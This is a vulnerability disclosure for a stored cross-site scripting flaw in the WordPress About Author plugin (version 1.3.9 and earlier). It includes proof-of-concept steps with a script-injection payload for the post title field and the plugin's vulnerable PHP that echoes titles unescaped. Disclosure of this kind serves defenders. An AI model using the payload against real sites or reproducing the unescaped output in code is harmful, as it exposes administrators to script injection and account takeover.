Wordpress About Author <= 1.3.9 Authenticated Stored XSS
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.
Intial submission of the vulnerability
# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.
2. Proof of Concept:
Stored Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability is affecting all pages/routes within the Wordpress Admin panel.
Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```
Detailed analysis of the vulnerability
By going within admin panel at About Author > Add new
we can add the following payload "><script>alert(1)</script>
. This is not the issue, manly XSS vulnerabilities are output related issues. Therefore by looking at /wp-content/plugins/about-author
at lines 335-353
we can observe the following unescaped output of user-supplied data, on line 345
that leads to the stored XSS by outputting database stored data.
<div id="AMSA" style="display:none;">
<?php $all_posts = wp_count_posts( 'about_author')->publish;
if(!$all_posts==null) {?>
<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
<select id="Ab_Tm_ME">
<?php
global $wpdb;
$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish' AND post_type='about_author' ");
foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
} ?>
</select>
<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
<?php } else { ?>
<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
}
?>
</div>
The successful exploitation of the vulnerability looks as follows in the HTML output:
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
Note that, due to style="display:none;"
of the div tag, the vulnerabilitie was available on all pages of the Wordpress Admin panel. Keep in mind that "><script>alert(1)</script>
will be executed regardless of the style="display:none;"
.
How to fix
Update to the latest available version of the About Author plugin.
Public appearances
- tba
Other references
- tba
Comments